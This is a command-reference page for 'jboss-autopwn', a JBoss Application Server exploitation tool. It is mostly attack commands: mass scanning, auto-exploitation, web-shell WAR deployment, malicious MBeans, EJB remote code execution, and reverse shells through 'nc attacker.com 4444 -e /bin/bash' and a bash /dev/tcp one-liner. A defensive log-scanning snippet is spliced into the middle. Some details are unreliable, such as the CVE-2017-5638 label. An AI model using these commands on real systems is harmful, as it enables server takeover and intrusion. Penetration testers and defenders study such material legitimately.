
jboss-autopwn

Overview

jboss-autopwn is a JBoss Application Server exploitation tool designed for security professionals to automate the discovery and exploitation of known JBoss vulnerabilities. It facilitates rapid vulnerability assessment and verification of JBoss AS security posture during authorized penetration tests.

The tool supports multiple JBoss versions and provides automated exploitation capabilities for common misconfigurations and known CVEs affecting JBoss AS deployments.

Installation

Prerequisites

  • Python 2.7+ or Python 3.x
  • Git
  • JBoss AS instance (for testing)
  • Proper authorization and scope approval

Installation Steps

# Clone the repository
git clone https://github.com/SecurityBegins/jboss-autopwn.git
cd jboss-autopwn

# Install dependencies
pip install -r requirements.txt

# Make executable
chmod +x jboss-autopwn.py

# Verify installation
python jboss-autopwn.py --help

Docker Installation

# Build Docker image
docker build -t jboss-autopwn .

# Run in container
docker run -it jboss-autopwn python jboss-autopwn.py --help

Basic Usage

Syntax

python jboss-autopwn.py [OPTIONS] -t <target>

Common Options

Option            Description
-t, --target      Target JBoss URL (http://host:port)
-p, --port        Port number (default: 8080)
-u, --username    JBoss admin username
-P, --password    JBoss admin password
--exploit         Specific exploit to run
-f, --file        Payload file for upload
-v, --verbose     Verbose output
-h, --help        Display help message

Common Commands

Target Discovery and Probing

# Basic target scanning
python jboss-autopwn.py -t http://192.168.1.100:8080

# Scan with custom port
python jboss-autopwn.py -t 192.168.1.100 -p 8090

# Verbose output for debugging
python jboss-autopwn.py -t http://target.com:8080 -v

# Scan entire subnet
python jboss-autopwn.py -t http://192.168.1.0/24 -p 8080

Version Detection

# Detect JBoss version
python jboss-autopwn.py -t http://target.com:8080 --version

# Check for specific vulnerability
python jboss-autopwn.py -t http://target.com:8080 --check-cve CVE-2017-12149

# List detected vulnerabilities
python jboss-autopwn.py -t http://target.com:8080 --list-vulns

Exploitation Techniques

# Auto-exploit detected vulnerabilities
python jboss-autopwn.py -t http://target.com:8080 --auto-exploit

# Exploit with reverse shell
python jboss-autopwn.py -t http://target.com:8080 --exploit shell \
  --lhost 192.168.1.50 --lport 4444

# Upload malicious WAR file
python jboss-autopwn.py -t http://target.com:8080 \
  -f malicious.war --deploy

# Execute system command
python jboss-autopwn.py -t http://target.com:8080 \
  --cmd "whoami" --execute

Authenticated Exploitation

# Connect with credentials
python jboss-autopwn.py -t http://target.com:8080 \
  -u admin -P password123 --exploit

# Use provided credentials for JMX
python jboss-autopwn.py -t http://target.com:8080 \
  --jmx-user admin --jmx-pass password123 \
  --jmx-exploit

Exploit Types

WAR Deployment Exploits

# Generate web shell WAR
python jboss-autopwn.py -t http://target.com:8080 \
  --generate-war shell.war

# Deploy WAR directly
python jboss-autopwn.py -t http://target.com:8080 \
  -f shell.war --direct-deploy

# Access deployed application
curl http://target.com:8080/shell/

JMX Exploitation

# Exploit JMX service
python jboss-autopwn.py -t http://target.com:8080 \
  --jmx-service --jmx-port 4447

# Create malicious MBean
python jboss-autopwn.py -t http://target.com:8080 \
  --create-mbean --bean-class PayloadClass

EJB Invocation

# Invoke EJB methods
python jboss-autopwn.py -t http://target.com:8080 \
  --invoke-ejb -b TargetEJB

# Remote method execution via EJB
python jboss-autopwn.py -t http://target.com:8080 \
  --ejb-rce --method-name execute

Advanced Configuration

Custom Payload Creation

# Create custom Java deserialization payload
python jboss-autopwn.py --generate-payload \
  --payload-type java-deser \
  --command "nc attacker.com 4444 -e /bin/bash"

# Generate ysoserial payload
python jboss-autopwn.py --payload-generator ysoserial \
  --gadget CommonsCollections5 \
  --command "touch /tmp/pwned"

Session Configuration

# Save configuration for repeated use
cat > jboss-config.txt << EOF
target=http://192.168.1.100:8080
port=8080
username=admin
password=admin123
timeout=30
retries=3
EOF

# Use configuration file
python jboss-autopwn.py -c jboss-config.txt

Multi-Target Scanning

# Create targets file
cat > targets.txt << EOF
http://192.168.1.100:8080
http://192.168.1.101:8080
http://target.example.com:8080
EOF

# Scan multiple targets
python jboss-autopwn.py -f targets.txt --batch-mode

# Batch exploitation
python jboss-autopwn.py -f targets.txt --exploit --log-results

Vulnerability Assessment

Known JBoss Vulnerabilities

# Check CVE-2017-12149 (Deserialization RCE)
python jboss-autopwn.py -t http://target.com:8080 \
  --check-cve CVE-2017-12149

# Check CVE-2017-5638 (EJBInvokerServlet)
python jboss-autopwn.py -t http://target.com:8080 \
  --check-cve CVE-2017-5638

# Comprehensive vulnerability scan
python jboss-autopwn.py -t http://target.com:8080 \
  --full-scan --report vulnerability-report.html
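
The defender-side counterpart to these checks, as an added example that is not part of the original page or of jboss-autopwn: a scan of web access logs for requests to the JBoss invoker and console endpoints. The path list (legacy JBoss AS defaults), the combined log format, and the names `classify` and `summarize` are assumptions made for this example.

```python
import re
from collections import defaultdict

# Default paths on legacy JBoss AS (assumed here; adjust to the deployment).
SENSITIVE_PATHS = {
    "/invoker/readonly": "HTTP invoker (CVE-2017-12149 surface)",
    "/invoker/ejbinvokerservlet": "EJB invoker servlet",
    "/invoker/jmxinvokerservlet": "JMX invoker servlet",
    "/jmx-console": "JMX console",
}

# Combined log format: ip ident user [time] "METHOD path proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

def classify(line):
    """Return (ip, surface, severity) for a request to a sensitive path, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path = m["path"].split("?", 1)[0].lower()
    for prefix, surface in SENSITIVE_PATHS.items():
        if path.startswith(prefix):
            status = int(m["status"])
            # A processed POST (2xx/5xx) matters more than a rejected request (401/403/404).
            reached = m["method"] == "POST" and (status < 300 or status >= 500)
            return m["ip"], surface, "high" if reached else "probe"
    return None

def summarize(lines):
    """Group hits per source IP: counts by severity plus the surfaces touched."""
    report = defaultdict(lambda: {"probe": 0, "high": 0, "surfaces": set()})
    for line in lines:
        hit = classify(line)
        if hit:
            ip, surface, severity = hit
            report[ip][severity] += 1
            report[ip]["surfaces"].add(surface)
    return dict(report)

# Constructed sample lines (documentation IP range), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /index.html HTTP/1.1" 200 512',
    '192.0.2.44 - - [01/Jan/2024:10:00:05 +0000] "GET /jmx-console/ HTTP/1.1" 401 0',
    '192.0.2.44 - - [01/Jan/2024:10:00:06 +0000] "GET /invoker/JMXInvokerServlet HTTP/1.1" 404 0',
    '192.0.2.44 - - [01/Jan/2024:10:00:07 +0000] "POST /invoker/readonly HTTP/1.1" 500 1024',
]
```

Calling `summarize(SAMPLE_LOG)` reports one source with two probes and one high-severity hit; a source that touches several of these surfaces within seconds is typical of automated scanning and worth correlating with the test window of any authorized engagement.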

Output and Reporting

Generate Reports

# HTML report generation
python jboss-autopwn.py -t http://target.com:8080 \
  --full-scan --html-report report.html

# JSON output for automation
python jboss-autopwn.py -t http://target.com:8080 \
  --output-json results.json

# CSV export for analysis
python jboss-autopwn.py -t http://target.com:8080 \
  --output-csv results.csv

Logging and Monitoring

# Enable detailed logging
python jboss-autopwn.py -t http://target.com:8080 \
  -v --log-file audit.log

# Real-time output
python jboss-autopwn.py -t http://target.com:8080 \
  --real-time-output

# Save session transcript
python jboss-autopwn.py -t http://target.com:8080 \
  --transcript session.txt

Reverse Shell and Post-Exploitation

Establishing Command Shells

# Reverse shell with Netcat listener
# Attacker machine:
nc -lvnp 4444

# jboss-autopwn command:
python jboss-autopwn.py -t http://target.com:8080 \
  --reverse-shell --lhost 192.168.1.50 --lport 4444

# Bash reverse shell
python jboss-autopwn.py -t http://target.com:8080 \
  --cmd "bash -i >& /dev/tcp/192.168.1.50/4444 0>&1"

Interactive Shell Access

# Start interactive shell mode
python jboss-autopwn.py -t http://target.com:8080 \
  --interactive-shell

# Execute commands interactively
jboss> whoami
jboss> id
jboss> ls -la /opt/jboss

Best Practices

Pre-Exploitation Checklist

  • Verify scope and obtain written authorization
  • Document target system details and baseline
  • Test tools on isolated lab environments first
  • Prepare incident response procedures
  • Establish clear communication channels
  • Maintain detailed activity logs
  • Create backup snapshots before testing

Safe Testing Guidelines

# Dry-run mode (show what would happen without executing)
python jboss-autopwn.py -t http://target.com:8080 \
  --dry-run --verbose

# Test on development instance first
python jboss-autopwn.py -t http://dev-jboss.internal:8080 \
  --safe-mode

# Validate payload before deployment
python jboss-autopwn.py --validate-payload test.war

Troubleshooting

Connection Issues

# Test connectivity
python jboss-autopwn.py -t http://target.com:8080 \
  --test-connection --verbose

# Check proxy settings
python jboss-autopwn.py -t http://target.com:8080 \
  --proxy http://proxy.internal:8080 \
  --proxy-user username --proxy-pass password

# SSL/TLS verification
python jboss-autopwn.py -t https://target.com:8443 \
  --ignore-ssl-warnings

Common Errors and Solutions

Error                       Solution
Connection timeout          Verify target is online, check firewall rules, adjust timeout
Authentication failed       Verify credentials, check account lockout status
Version detection failed    Try manual version specification with --version
Payload upload failed       Check file permissions, verify WAR format, check disk space
RCE not working             Try different gadget chains, verify Java version compatibility

Debug Mode

# Maximum verbosity
python jboss-autopwn.py -t http://target.com:8080 \
  -vvv --debug --log-level DEBUG

# Packet capture
python jboss-autopwn.py -t http://target.com:8080 \
  --tcpdump --pcap-file traffic.pcap

# Python traceback on error
python jboss-autopwn.py -t http://target.com:8080 \
  --verbose --traceback

  • Only use jboss-autopwn on systems you own or have explicit written authorization to test
  • Obtain proper approval from system owners and stakeholders before testing
  • Follow responsible disclosure procedures for discovered vulnerabilities
  • Maintain confidentiality of security assessment results
  • Document all activities for compliance and audit purposes
  • Use only for authorized penetration testing and vulnerability assessment
  • Comply with all applicable laws and regulations in your jurisdiction

Resources and References

See Also

  • Metasploit Framework JBoss modules
  • Custom exploitation development techniques
  • Java deserialization exploitation
  • WAR file structure and deployment